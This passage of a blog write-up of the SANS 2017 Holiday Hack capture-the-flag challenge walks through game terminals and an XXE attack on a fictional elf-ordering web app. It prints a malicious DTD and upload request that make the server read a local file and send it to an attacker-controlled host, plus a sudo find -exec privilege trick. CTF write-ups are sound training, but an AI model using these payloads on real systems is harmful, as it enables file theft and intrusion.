&lt;span class="k"&gt;Old&lt;/span&gt; &lt;span class="n"&gt;Time&lt;/span&gt; &lt;span class="n"&gt;Christmas&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1696&lt;/span&gt;
&lt;span class="n"&gt;Cold&lt;/span&gt; &lt;span class="n"&gt;December&lt;/span&gt; &lt;span class="n"&gt;Night&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1697&lt;/span&gt;
&lt;span class="n"&gt;Blue&lt;/span&gt; &lt;span class="n"&gt;Holiday&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1698&lt;/span&gt;
&lt;span class="n"&gt;Home&lt;/span&gt; &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;Christmas&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1702&lt;/span&gt;
&lt;span class="n"&gt;Christmas&lt;/span&gt; &lt;span class="n"&gt;Memories&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1706&lt;/span&gt;
&lt;span class="n"&gt;Christmas&lt;/span&gt; &lt;span class="k"&gt;Is&lt;/span&gt; &lt;span class="n"&gt;Now&lt;/span&gt; &lt;span class="n"&gt;Drawing&lt;/span&gt; &lt;span class="n"&gt;Near&lt;/span&gt; &lt;span class="k"&gt;at&lt;/span&gt; &lt;span class="n"&gt;Hand&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1715&lt;/span&gt;
&lt;span class="n"&gt;Coventry&lt;/span&gt; &lt;span class="n"&gt;Carol&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1719&lt;/span&gt;
&lt;span class="n"&gt;The&lt;/span&gt; &lt;span class="n"&gt;Little&lt;/span&gt; &lt;span class="n"&gt;Boy&lt;/span&gt; &lt;span class="n"&gt;that&lt;/span&gt; &lt;span class="n"&gt;Santa&lt;/span&gt; &lt;span class="n"&gt;Claus&lt;/span&gt; &lt;span class="n"&gt;Forgot&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1720&lt;/span&gt;
&lt;span class="n"&gt;Joy&lt;/span&gt; &lt;span class="k"&gt;to&lt;/span&gt; &lt;span class="n"&gt;the&lt;/span&gt; &lt;span class="n"&gt;World&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;1756&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="n"&gt;Stairway&lt;/span&gt; &lt;span class="k"&gt;to&lt;/span&gt; &lt;span class="n"&gt;Heaven&lt;/span&gt;&lt;span class="o"&gt;|&lt;/span&gt;&lt;span class="mi"&gt;8996&lt;/span&gt;
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The most-liked song this Christmas seems to be &lt;a class="reference external" href="https://www.youtube.com/watch?v=cwFQpRTwaP0"&gt;Stairway to Heaven&lt;/a&gt;.
Although &lt;a class="reference external" href="https://www.youtube.com/watch?v=FlFjR2vUy3M"&gt;I Farted on Santa's Lap (Now Christmas Is Gonna Stink for Me)&lt;/a&gt;
seems to be doing pretty well!&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@ef4955c61cfe:~$&lt;/span&gt; ./runtoanswer
&lt;span class="go"&gt;Starting up, please wait......&lt;/span&gt;
&lt;span class="go"&gt;Enter the name of the song with the most likes: Stairway to Heaven&lt;/span&gt;
&lt;span class="go"&gt;That is the #1 Christmas song, congratulations!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="id11"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id47"&gt;Redirecting the snowball&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;Having the found the most popular song for this Christmas, we're given a new
object: the Portal, which can create a duplicate of our snowball in a second
place.&lt;/p&gt;
&lt;img alt="i_dont_think_we_re_in_kansas_terminal.png" class="align-center" src="/images/sans-christmas-challenge-2017/i_dont_think_we_re_in_kansas_terminal.png" /&gt;
&lt;p&gt;Here's the layout:&lt;/p&gt;
&lt;img alt="i_dont_think_we_re_in_kansas_anymore.gif" class="align-center" src="/images/sans-christmas-challenge-2017/i_dont_think_we_re_in_kansas_anymore.gif" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="north-pole-christmas-town-infrastructure-elf-as-a-service-platform"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id48"&gt;North Pole Christmas Town infrastructure: Elf as a Service platform&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The Elf as a Service platform is a web application where you can order new
elves. To do so, you only have to upload an XML files, containing the details
of th elves you wish to order:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;POST&lt;/span&gt; &lt;span class="nn"&gt;/Home/DisplayXml&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;eaas.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1946&lt;/span&gt;
&lt;span class="na"&gt;Origin&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;http://eaas.northpolechristmastown.com&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;multipart/form-data; boundary=----WebKitFormBoundaryflybX2ZBWLwspXMu&lt;/span&gt;

------WebKitFormBoundaryflybX2ZBWLwspXMu
Content-Disposition: form-data; name=&amp;quot;file&amp;quot;; filename=&amp;quot;Elfdata.xml&amp;quot;
Content-Type: text/xml

&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&amp;lt;Elf&amp;gt;&amp;lt;Elf&amp;gt;&amp;lt;ElfID&amp;gt;1&amp;lt;/ElfID&amp;gt;&amp;lt;ElfName&amp;gt;Elf On a Shelf&amp;lt;/ElfName&amp;gt;&amp;lt;Contact&amp;gt;8675309&amp;lt;/Contact&amp;gt;&amp;lt;DateOfPurchase&amp;gt;11/29/2017 12:00:00 AM&amp;lt;/DateOfPurchase&amp;gt;&amp;lt;Picture&amp;gt;1.png&amp;lt;/Picture&amp;gt;&amp;lt;Address&amp;gt;On a Shelf, Obviously&amp;lt;/Address&amp;gt;&amp;lt;/Elf&amp;gt;&amp;lt;Elf&amp;gt;&amp;lt;ElfID&amp;gt;2&amp;lt;/ElfID&amp;gt;&amp;lt;ElfName&amp;gt;Buddy the Elf&amp;lt;/ElfName&amp;gt;&amp;lt;Contact&amp;gt;8675309&amp;lt;/Contact&amp;gt;&amp;lt;DateOfPurchase&amp;gt;11/29/2017 12:00:00 AM&amp;lt;/DateOfPurchase&amp;gt;&amp;lt;Picture&amp;gt;2.png&amp;lt;/Picture&amp;gt;&amp;lt;Address&amp;gt;New York City&amp;lt;/Address&amp;gt;&amp;lt;/Elf&amp;gt;&amp;lt;Elf&amp;gt;&amp;lt;ElfID&amp;gt;3&amp;lt;/ElfID&amp;gt;&amp;lt;ElfName&amp;gt;Legolas&amp;lt;/ElfName&amp;gt;&amp;lt;Contact&amp;gt;8675309&amp;lt;/Contact&amp;gt;&amp;lt;DateOfPurchase&amp;gt;11/29/2017 12:00:00 AM&amp;lt;/DateOfPurchase&amp;gt;&amp;lt;Picture&amp;gt;3.png&amp;lt;/Picture&amp;gt;&amp;lt;Address&amp;gt;Middle Earth&amp;lt;/Address&amp;gt;&amp;lt;/Elf&amp;gt;&amp;lt;Elf&amp;gt;&amp;lt;ElfID&amp;gt;4&amp;lt;/ElfID&amp;gt;&amp;lt;ElfName&amp;gt;Marcus Elf&amp;lt;/ElfName&amp;gt;&amp;lt;Contact&amp;gt;8675309&amp;lt;/Contact&amp;gt;&amp;lt;DateOfPurchase&amp;gt;11/29/2017 12:00:00 AM&amp;lt;/DateOfPurchase&amp;gt;&amp;lt;Picture&amp;gt;4.png&amp;lt;/Picture&amp;gt;&amp;lt;Address&amp;gt;Canada&amp;lt;/Address&amp;gt;&amp;lt;/Elf&amp;gt;&amp;lt;Elf&amp;gt;&amp;lt;ElfID&amp;gt;5&amp;lt;/ElfID&amp;gt;&amp;lt;ElfName&amp;gt;Alf&amp;lt;/ElfName&amp;gt;&amp;lt;Contact&amp;gt;8675309&amp;lt;/Contact&amp;gt;&amp;lt;DateOfPurchase&amp;gt;11/29/2017 12:00:00 AM&amp;lt;/DateOfPurchase&amp;gt;&amp;lt;Picture&amp;gt;5.png&amp;lt;/Picture&amp;gt;&amp;lt;Address&amp;gt;Melmac&amp;lt;/Address&amp;gt;&amp;lt;/Elf&amp;gt;&amp;lt;Elf&amp;gt;&amp;lt;ElfID&amp;gt;6&amp;lt;/ElfID&amp;gt;&amp;lt;ElfName&amp;gt;Dobby the House Elf&amp;lt;/ElfName&amp;gt;&amp;lt;Contact&amp;gt;8675309&amp;lt;/Contact&amp;gt;&amp;lt;DateOfPurchase&amp;gt;11/29/2017 12:00:00 AM&amp;lt;/DateOfPurchase&amp;gt;&amp;lt;Picture&amp;gt;6.png&amp;lt;/Picture&amp;gt;&amp;lt;Address&amp;gt;London&amp;lt;/Address&amp;gt;&amp;lt;/Elf&amp;gt;&amp;lt;Elf&amp;gt;&amp;lt;ElfID&amp;gt;7&amp;lt;/ElfID&amp;gt;&amp;lt;ElfName&amp;gt;Malekith&amp;lt;/ElfName&amp;gt;&amp;lt;Contact&amp;gt;8675309&amp;lt;/Contact&amp;gt;&amp;lt;DateOfPurchase&amp;gt;11/29/2017 12:00:00 AM&amp;lt;/DateOfPurchase&amp;gt;&amp;lt;Picture&amp;gt;7.png&amp;lt;/Picture&amp;gt;&amp;lt;Address&amp;gt;Asgard&amp;lt;/Address&amp;gt;&amp;lt;/Elf&amp;gt;&amp;lt;Elf&amp;gt;&amp;lt;ElfID&amp;gt;8&amp;lt;/ElfID&amp;gt;&amp;lt;ElfName&amp;gt;Keebler Elf&amp;lt;/ElfName&amp;gt;&amp;lt;Contact&amp;gt;8675309&amp;lt;/Contact&amp;gt;&amp;lt;DateOfPurchase&amp;gt;11/29/2017 12:00:00 AM&amp;lt;/DateOfPurchase&amp;gt;&amp;lt;Picture&amp;gt;8.png&amp;lt;/Picture&amp;gt;&amp;lt;Address&amp;gt;Tree&amp;lt;/Address&amp;gt;&amp;lt;/Elf&amp;gt;&amp;lt;Elf&amp;gt;&amp;lt;ElfID&amp;gt;9&amp;lt;/ElfID&amp;gt;&amp;lt;ElfName&amp;gt;Jangle Bells&amp;lt;/ElfName&amp;gt;&amp;lt;Contact&amp;gt;8675309&amp;lt;/Contact&amp;gt;&amp;lt;DateOfPurchase&amp;gt;11/29/2017 12:00:00 AM&amp;lt;/DateOfPurchase&amp;gt;&amp;lt;Picture&amp;gt;9.png&amp;lt;/Picture&amp;gt;&amp;lt;Address&amp;gt;North Pole&amp;lt;/Address&amp;gt;&amp;lt;/Elf&amp;gt;&amp;lt;/Elf&amp;gt;

------WebKitFormBoundaryflybX2ZBWLwspXMu--
&lt;/pre&gt;&lt;/div&gt;
&lt;img alt="eaas_application.png" class="align-center" src="/images/sans-christmas-challenge-2017/eaas_application.png" /&gt;
&lt;p&gt;Hmm, that's interesting. Uploading XML files can often lead to eXternal XML
Entities (XXE) attacks. If the XML parser on the server side does not filter
XML entities, we can make the server perform several actions, such as outputing
the content of a local file, etc. More details are given in this &lt;a class="reference external" href="https://pen-testing.sans.org/blog/2017/12/08/entity-inception-exploiting-iis-net-with-xxe-vulnerabilities"&gt;SANS blog
post&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Since we want to recover the content of &lt;code&gt;C:\greatbook.txt&lt;/code&gt;, let's
implement the attack, as given in the above tutorial. First, we'll host a
malicious .dtd file on our public facing server:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="cp"&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;!ENTITY % stolendata SYSTEM &amp;quot;file:///c:/greatbook.txt&amp;quot;&amp;gt;&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;!ENTITY % inception &amp;quot;&amp;lt;!ENTITY &amp;amp;#x25; sendit SYSTEM &amp;#39;http://X.X.X.X/greatbook?%stolendata;&amp;#39;&amp;gt;&lt;/span&gt;&amp;quot;&amp;gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Then, we'll send our malicious XML file to the EaaS application:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;POST /Home/DisplayXml HTTP/1.1
Host: eaas.northpolechristmastown.com
Content-Length: 731
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryflybX2ZBWLwspXMu

------WebKitFormBoundaryflybX2ZBWLwspXMu
Content-Disposition: form-data; name=&amp;quot;file&amp;quot;; filename=&amp;quot;Elfdata.xml&amp;quot;
Content-Type: text/xml

&lt;span class="cp"&gt;&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;/span&gt;
&lt;span class="cp"&gt;&amp;lt;!DOCTYPE demo [&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="cp"&gt;     &amp;lt;!ELEMENT demo ANY &amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;     &lt;span class="cp"&gt;&amp;lt;!ENTITY % extentity SYSTEM &amp;quot;http://X.X.X.X/evil.dtd&amp;quot;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;span class="hll"&gt;     %extentity;
&lt;/span&gt;&lt;span class="hll"&gt;     %inception;
&lt;/span&gt;&lt;span class="hll"&gt;     %sendit;
&lt;/span&gt;      ]
&amp;gt;
&lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;Elf&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
    &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;Elf&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
        &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;ElfID&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;1&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;ElfID&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
        &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;ElfName&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;Elf On a Shelf&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;ElfName&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
        &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;Contact&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;8675309&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;Contact&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
        &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;DateOfPurchase&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;11/29/2017 12:00:00 AM&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;DateOfPurchase&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
        &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;Picture&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;1.png&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;Picture&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
        &lt;span class="p"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nt"&gt;Address&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;On a shelf, obviously&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;Address&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
   &lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;Elf&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;
&lt;span class="p"&gt;&amp;lt;/&lt;/span&gt;&lt;span class="nt"&gt;Elf&lt;/span&gt;&lt;span class="p"&gt;&amp;gt;&lt;/span&gt;

------WebKitFormBoundaryflybX2ZBWLwspXMu--
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We now trigger the XML parser by visiting the &lt;code&gt;/Home/DisplayXml&lt;/code&gt; page,
which will trigger the downloading of our evil .dtd file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; tail -f access.log &lt;span class="p"&gt;|&lt;/span&gt; grep -E &lt;span class="s1"&gt;&amp;#39;greatbook|evil.dtd&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;35.185.118.225 - - [29/Dec/2017:00:22:54 +0100] &amp;quot;GET /evil.dtd HTTP/1.1&amp;quot; 200 200 &amp;quot;-&amp;quot; &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;35.185.118.225 - - [29/Dec/2017:00:22:54 +0100] &amp;quot;GET /greatbook?http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf HTTP/1.1&amp;quot; 404 169 &amp;quot;-&amp;quot; &amp;quot;-&amp;quot;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Our payload work! We now have the content of &lt;code&gt;C:\greatbook.txt&lt;/code&gt;, which
is the URL &lt;a class="reference external" href="http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf"&gt;http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf&lt;/a&gt;.
We can now download the &lt;a class="reference external" href="/docs/sans-christmas-challenge-2017/greatbook6.pdf"&gt;sixth page of The Great Book&lt;/a&gt;
(sha256: &lt;code&gt;92dff9b155da22001dc72340791bde703fbf83bc0369e95aa9baea4ed5c36a84&lt;/code&gt;):&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The Dreaded Inter-Dimensional Tornadoes&lt;/p&gt;
&lt;p&gt;Throughout our recorded history, Oz has benefitted from quite favorable
weather, with frequent sunny days and a moderatly warm climate. Indeed, all
Munchkins enjoy essentially year-round springtime weather, keepking flowers
in bloom and making spirits bright.&lt;/p&gt;
&lt;p&gt;However, one type of weather phenomenon interrupts the otherwise beautiful
climate of Oz - the dreaded Inter-Dimensional Tornadoes - when the weather
outside is frightful. While quite rare, these ferocious storms appear
suddenly and without a warning, striking Oz every year or two. These
calamitous cyclones vary in intensity, but even the weakest have caused
significant damage, lifting houses off their foundations and shredding
everything in their deadly path, especially paper products.&lt;/p&gt;
&lt;p&gt;Inter-Dimensional Tornadoes get their unusual name because their intense
power has been known to rip holes into the very fabric of space and time,
allowing a single tornado to strike multiple different places in disparate
time eras simultaneously, interlinking each time and location touched by
the storm into a swirling inter-dimensional space-time vortex. Although the
specific physics of such storms remains elusive to our best scientists, one
thing is consistently observed by researchers and historians: When an
Inter-Dimensional Tornado strikes, it not only scatters whatever it has
vacuumed up throughout many lands, it sometimes also drops artifacts from
the past or even the future in its wake. Such storms have brought antique
watches, clothing, and curious gadgetry, lifting them from distant times
and far away places and depositing them in Oz.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="seventh-page-of-the-great-book"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id49"&gt;Seventh page of &lt;em&gt;The Great Book&lt;/em&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="north-pole-and-beyond-oh-wait-maybe-we-are"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id50"&gt;North Pole and Beyond: Oh wait! Maybe we are...&lt;/a&gt;&lt;/h3&gt;
&lt;div class="section" id="id12"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id51"&gt;Cranberry Pi&lt;/a&gt;&lt;/h4&gt;
&lt;pre class="literal-block"&gt;
              \ /
            --&amp;gt;*&amp;lt;--
              /o\
             /_\_\
            /_/_0_\
           /_o_\_\_\
          /_/_/_/_/o\
         /&amp;#64;\_\_\&amp;#64;\_\_\
        /_/_/O/_/_/_/_\
       /_\_\_\_\_\o\_\_\
      /_/0/_/_/_0_/_/&amp;#64;/_\
     /_\_\_\_\_\_\_\_\_\_\
    /_/o/_/_/&amp;#64;/_/_/o/_/0/_\
   jgs       [___]
My name is Shinny Upatree, and I've made a big mistake.
I fear it's worse than the time I served everyone bad hake.
I've deleted an important file, which suppressed my server access.
I can offer you a gift, if you can fix my ill-fated redress.
Restore /etc/shadow with the contents of /etc/shadow.bak, then run &amp;quot;inspect_da_box&amp;quot; to complete this challenge.
Hint: What commands can you run with sudo?
&lt;/pre&gt;
&lt;p&gt;We need to restore the content of &lt;code&gt;/etc/shadow.bak&lt;/code&gt; to &lt;code&gt;/etc/shadow&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;The hint is a pretty big one. If you remember &lt;a class="reference external" href="/posts/2017/01/05/sans-christmas-challenge-2016/#sans-christmas-challenge-2016"&gt;last year's Christmas Challenge&lt;/a&gt;,
you remember that we can use &lt;code&gt;sudo -l&lt;/code&gt; to see what kind of command we
can execute:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@760499dcc4c9:~$&lt;/span&gt; sudo -l
&lt;span class="go"&gt;Matching Defaults entries for elf on 760499dcc4c9:&lt;/span&gt;
&lt;span class="go"&gt;    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin&lt;/span&gt;
&lt;span class="go"&gt;User elf may run the following commands on 760499dcc4c9:&lt;/span&gt;
&lt;span class="go"&gt;    (elf : shadow) NOPASSWD: /usr/bin/find&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can execute &lt;code&gt;find&lt;/code&gt; as &lt;code&gt;elf:shadow&lt;/code&gt; (that is, as the user
&lt;code&gt;elf&lt;/code&gt;, member of the group &lt;code&gt;shadow&lt;/code&gt;, I didn't know this syntax).
Let's take a look at the permissions to our &lt;code&gt;shadow&lt;/code&gt; files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@760499dcc4c9:~$&lt;/span&gt; ls -lh /etc/shadow*
&lt;span class="go"&gt;-rw-rw---- 1 root shadow 677 Dec 23 23:59 /etc/shadow&lt;/span&gt;
&lt;span class="go"&gt;-rw------- 1 root root   652 Nov 14 13:48 /etc/shadow-&lt;/span&gt;
&lt;span class="go"&gt;-rw-r--r-- 1 root root   677 Dec 15 19:59 /etc/shadow.bak&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We can see that the &lt;code&gt;shadow&lt;/code&gt; group has write access to &lt;code&gt;/etc/shadow&lt;/code&gt;.
So, we need a way, by running &lt;code&gt;find&lt;/code&gt;, to copy the content from
&lt;code&gt;/etc/shadow.bak&lt;/code&gt; to &lt;code&gt;/etc/shadow&lt;/code&gt;. Luckily, &lt;code&gt;find&lt;/code&gt; has the
&lt;code&gt;-exec&lt;/code&gt; parameter, which can be used to execute command on the found
files:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;elf@760499dcc4c9:~$&lt;/span&gt; sudo -g shadow /usr/bin/find /etc -name shadow.bak -exec cp &lt;span class="o"&gt;{}&lt;/span&gt; /etc/shadow &lt;span class="se"&gt;\;&lt;/span&gt; &lt;span class="m"&gt;2&lt;/span&gt;&amp;gt; /dev/null
&lt;span class="gp"&gt;elf@760499dcc4c9:~$&lt;/span&gt; inspect_da_box
&lt;span class="go"&gt;                     ___&lt;/span&gt;
&lt;span class="go"&gt;                    / __&amp;#39;.     .-&amp;quot;&amp;quot;&amp;quot;-.&lt;/span&gt;
&lt;span class="go"&gt;              .-&amp;quot;&amp;quot;-| |  &amp;#39;.&amp;#39;.  / .---. \&lt;/span&gt;
&lt;span class="go"&gt;             / .--. \ \___\ \/ /____| |&lt;/span&gt;
&lt;span class="go"&gt;            / /    \ `-.-;-(`_)_____.-&amp;#39;._&lt;/span&gt;
&lt;span class="go"&gt;           ; ;      `.-&amp;quot; &amp;quot;-:_,(o:==..`-. &amp;#39;.         .-&amp;quot;-,&lt;/span&gt;
&lt;span class="go"&gt;           | |      /       \ /      `\ `. \       / .-. \&lt;/span&gt;
&lt;span class="go"&gt;           \ \     |         Y    __...\  \ \     / /   \/&lt;/span&gt;
&lt;span class="go"&gt;     /\     | |    | .--&amp;quot;&amp;quot;--.| .-&amp;#39;      \  &amp;#39;.`---&amp;#39; /&lt;/span&gt;
&lt;span class="go"&gt;     \ \   / /     |`        \&amp;#39;   _...--.;   &amp;#39;---&amp;#39;`&lt;/span&gt;
&lt;span class="go"&gt;      \ &amp;#39;-&amp;#39; / jgs  /_..---.._ \ .&amp;#39;\\_     `.&lt;/span&gt;
&lt;span class="go"&gt;       `--&amp;#39;`      .&amp;#39;    (_)  `&amp;#39;/   (_)     /&lt;/span&gt;
&lt;span class="go"&gt;                  `._       _.&amp;#39;|         .&amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;                     ```````    &amp;#39;-...--&amp;#39;`&lt;/span&gt;
&lt;span class="go"&gt;/etc/shadow has been successfully restored!&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="id13"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id52"&gt;Redirecting the snowball&lt;/a&gt;&lt;/h4&gt;
&lt;p&gt;No new object for this one!&lt;/p&gt;
&lt;img alt="oh_wait_maybe_we_are_terminal.png" class="align-center" src="/images/sans-christmas-challenge-2017/oh_wait_maybe_we_are_terminal.png" /&gt;
&lt;p&gt;Here's the layout:&lt;/p&gt;
&lt;img alt="oh_wait_maybe_we_are_snowball.gif" class="align-center" src="/images/sans-christmas-challenge-2017/oh_wait_maybe_we_are_snowball.gif" /&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="north-pole-christmas-town-infrastructure-elf-machine-interface-server"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id53"&gt;North Pole Christmas Town infrastructure: Elf-Machine Interface server&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;The seventh question specifies that people use the Elf-Machine Interface server
to access email, and that we could get access to it via a phishing attack.&lt;/p&gt;
&lt;p&gt;Let's take a look at Alabaster's emails. First, the phishing scenario:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;From:&lt;/strong&gt; &lt;a class="reference external" href="mailto:alabaster.snowball&amp;#64;northpolechristmastown.com"&gt;alabaster.snowball&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;To:&lt;/strong&gt; &amp;quot;&lt;a class="reference external" href="mailto:jessica.claus&amp;#64;northpolechristmastown.com"&gt;jessica.claus&amp;#64;northpolechristmastown.com&lt;/a&gt;&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Subject:&lt;/strong&gt; gingerbread cookie recipe&lt;/p&gt;
&lt;p&gt;Hey Mrs Claus,&lt;/p&gt;
&lt;p&gt;Do you have that awesome gingerbread cookie recipe you made for me last
year? You sent it in a MS word .docx file. &lt;em&gt;I would totally open that
docx on my computer if you had that. I would click on anything with the
words gingerbread cookie recipe in it&lt;/em&gt;. I'm totally addicted and want to
make some more.&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Alabaster Snowball&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;From:&lt;/strong&gt; &lt;a class="reference external" href="mailto:alabaster.snowball&amp;#64;northpolechristmastown.com"&gt;alabaster.snowball&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;To:&lt;/strong&gt; &lt;a class="reference external" href="mailto:all&amp;#64;northpolechristmastown.com"&gt;all&amp;#64;northpolechristmastown.com&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Subject:&lt;/strong&gt; Re: COOKIES!&lt;/p&gt;
&lt;p&gt;Awesome, yea if anyone finds that .docx file containing the recipe for
